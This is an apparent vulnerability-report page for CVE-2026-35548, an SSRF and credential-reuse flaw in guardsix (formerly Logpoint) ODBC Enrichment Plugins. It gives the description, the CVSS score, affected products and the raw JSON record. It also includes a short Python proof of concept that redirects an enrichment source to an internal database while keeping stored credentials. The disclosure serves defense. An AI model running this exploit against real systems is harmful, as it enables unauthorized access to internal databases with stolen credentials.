Security Vulnerability Report
CVE-2026-35548 CVSS 8.5 HIGH

Published: 2026-04-22 15:16:16
Last Modified: 2026-05-12 20:05:08

Description

An issue was discovered in guardsix (formerly Logpoint) ODBC Enrichment Plugins before 5.2.1 (5.2.1 is used in guardsix 7.9.0.0). A logic flaw allowed stored database credentials to be reused after modification of the target Host, IP address, or Port. When editing an existing Enrichment Source, previously stored credentials were retained even if the connection endpoint was changed. An authenticated Operator user could redirect the database connection to unintended internal systems, resulting in SSRF and potential misuse of valid stored credentials.

CVSS Details

CVSS Score: 8.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:guardsix:logpoint:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:guardsix:odbc:*:*:*:*:*:*:*:* - VULNERABLE
guardsix ODBC Enrichment Plugins < 5.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual Proof of Concept for CVE-2026-35548
# This script demonstrates how an authenticated operator might exploit the logic flaw
# by updating the ODBC Enrichment Source endpoint while retaining credentials.
import requests

TARGET_URL = "https://guardsix-server/api/enrichment/sources/{source_id}"

# Attacker controlled session cookie or token
HEADERS = {
    "Authorization": "Bearer <operator_session_token>",
    "Content-Type": "application/json"
}

# Payload changing the host to an internal target (SSRF)
# The 'credentials_id' is intentionally reused from the original valid config
payload = {
    "name": "Legitimate Looking Source",
    "host": "127.0.0.1",  # Internal IP address
    "port": 3306,  # Internal database port
    "database_name": "mysql",
    "credentials_id": "cred_12345_stored"  # Logic flaw: credentials are not checked/rotated
}

response = requests.put(TARGET_URL, json=payload, headers=HEADERS, verify=False)

if response.status_code == 200:
    print("[+] Enrichment Source updated successfully.")
    print("[+] Server will now attempt to connect to internal DB using stored credentials.")
else:
    print("[-] Failed to update source.")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35548", "sourceIdentifier": "[email protected]", "published": "2026-04-22T15:16:16.100", "lastModified": "2026-05-12T20:05:07.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in guardsix (formerly Logpoint) ODBC Enrichment Plugins before 5.2.1 (5.2.1 is used in guardsix 7.9.0.0). A logic flaw allowed stored database credentials to be reused after modification of the target Host, IP address, or Port. When editing an existing Enrichment Source, previously stored credentials were retained even if the connection endpoint was changed. An authenticated Operator user could redirect the database connection to unintended internal systems, resulting in SSRF and potential misuse of valid stored credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:guardsix:logpoint:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.9.0", "matchCriteriaId": "A2D3137A-300D-4400-B643-B8E9CCDA06D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:guardsix:odbc:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.2.1", "matchCriteriaId": "4722C193-9502-4A23-88EF-8A6ED4F5EE4C"}]}]}], "references": [{"url": 
"https://guardsix.com/media-room#/pressreleases/logpoint-becomes-guardsix-as-europe-reassesses-sovereign-security-operations-3436974", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://servicedesk.guardsix.com/hc/en-us/articles/35555683205021-SSRF-in-ODBC-Enrichment-Source", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}